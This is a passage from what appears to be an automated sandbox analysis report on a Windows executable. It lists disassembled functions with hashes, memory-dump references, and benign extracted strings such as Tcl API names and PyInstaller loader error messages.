                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                    • Instruction ID: 4c8d186227f9c3d97e2a18e2587745cc516e953ddf87433502e5621a78b6a1e6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7519832A2965185E725AF2DC04023A77A0EB66B58F644131CB9D177B8EF7AE843C770
                                                                                                                                                                                                                                    Function 00007FF7B2B71D54 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                    • Instruction ID: 67e4c806be149172f60017aace216cd8a0d175c0e94c1b356d4ef293d9ca0850
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4051BB36A2965181E725AF2DC04033A73A0EB66B58F644131CF4D177B8EFBAE853C760
                                                                                                                                                                                                                                    Function 00007FF7B2B71B50 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                    • Instruction ID: 14b392952cdb4479b3a6ef715c6fb6b03ade443c98f0c4bef945435587d3b9ec
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD51B936A2965185E726AF2DC04023977A0EB56B58F644131CF4C177BCEF79E842D760
                                                                                                                                                                                                                                    Function 00007FF7B2B71F60 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                    • Instruction ID: f9a1893314f68a6a40ae7e94724b50d272ac2a715edb2d6b083f86053a19f996
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18519536A2965185E726AF2DC04023A77A0EB66B58F644131CF4C177BDEF7AE843C760
                                                                                                                                                                                                                                    Function 00007FF7B2B71740 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                    • Instruction ID: 0102f6562c7d8af2e52c96e8ff10f96d3a3d5ad9ef1daf7014a1a897cc0ec41d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3651B876A2A65185E725AF2DC04023A77B0EB56B58F644131CF4C177ACEF7AE843C760
                                                                                                                                                                                                                                    Function 00007FF7B2B75D30 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                    • Instruction ID: 14fb8fcc1249d7846f9653df4cc1a083b6d65fbc47e3a54f77487dc12237374e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7841886282B78A05E997B91C0504E7A96809F337A0DD85274DFBD173FBED4D6586C320
                                                                                                                                                                                                                                    Function 00007FF7B2B79EA0 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 485612231-0
                                                                                                                                                                                                                                    • Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                                    • Instruction ID: d974406722d87f4102e43e53f3fb94b793ffc07126476e52db64e4594a21d669
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6541E422715A5582EF44EF2ED9141AAA391B759FD0B899437DF0D97B68FE7CD042C300
                                                                                                                                                                                                                                    Function 00007FF7B2B780E4 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                    • Instruction ID: ca42d6e7e9ddb0c1886ccbd50c058dcc2d81e46546fd7a33a1dbccd14cff2bb3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6331E43270AB4141E656BF2D644012FAAD4AF96BD0F844638EB4D57BE9EF7CD001C710
                                                                                                                                                                                                                                    Function 00007FF7B2B89570 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                                    • Instruction ID: 0e918a9ca1d53ac2e8f58792754d79baaa20aac506fa7b375f08a90711c74ddd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0DF044727196958ADB9A9F6DA40262AB7D0F7593C0F84C039D68D83B08DE7C9051CF14
                                                                                                                                                                                                                                    Function 00007FF7B2B6D30C Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                                    • Instruction ID: 95ca482e75259bbe3962d1a9c324b6904edd8be1f173262d45ef2703bbafc12b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40A0012190E80AD0E646AB19E8A4026A620BB66310BC44039E24D950B8AEACA404E325
                                                                                                                                                                                                                                    Function 00007FF7B2B676C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                    • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                    • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                    • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                    • Instruction ID: 7cee0317d960ab9893017302a2c4e8651fb670b036d71077773a85c5d6a10499
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E02CE2490BB0790FA47BB2DA818976E261BF27754BD4013AC61D862ACFFBCB545D270
                                                                                                                                                                                                                                    Function 00007FF7B2B681D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B69390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7B2B645F4,00000000,00007FF7B2B61985), ref: 00007FF7B2B693C9
                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7B2B686B7,?,?,00000000,00007FF7B2B63CBB), ref: 00007FF7B2B6822C
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B62810: MessageBoxW.USER32 ref: 00007FF7B2B628EA
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                    • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                    • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                    • Opcode ID: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                                                                                                                                                                    • Instruction ID: 4818b52453b51d62472c0378ddbe64f7ebf60f7328583c4c5c13f56a5c09139a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7151A411A1A64340FA53BB2C98556BBE260EF66740FC44436E74EC66DDFEACE404C364
                                                                                                                                                                                                                                    Function 00007FF7B2B62180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                    • String ID: P%
                                                                                                                                                                                                                                    • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                    • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                    • Instruction ID: 7a6ca021610276367d7aa8ee5b7aa4638acc1f899663f11cac4944fd6f4c4c0c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 935138226047A186D6349F36E4181BBF7A1F7A8B61F044125EFCE83699EF7CD085CB20
                                                                                                                                                                                                                                    Function 00007FF7B2B680C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                    • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                    • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                    • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                    • Instruction ID: 00597c50c38c2ccc21b2ebea879ae522ea4e1956abc57469e141b1a2ae1aa794
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C21DD21B0AA4281E7476B7DA858176E250FF6AB90F984134DB1DC73EDFE6CD584C324
                                                                                                                                                                                                                                    Function 00007FF7B2B76290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
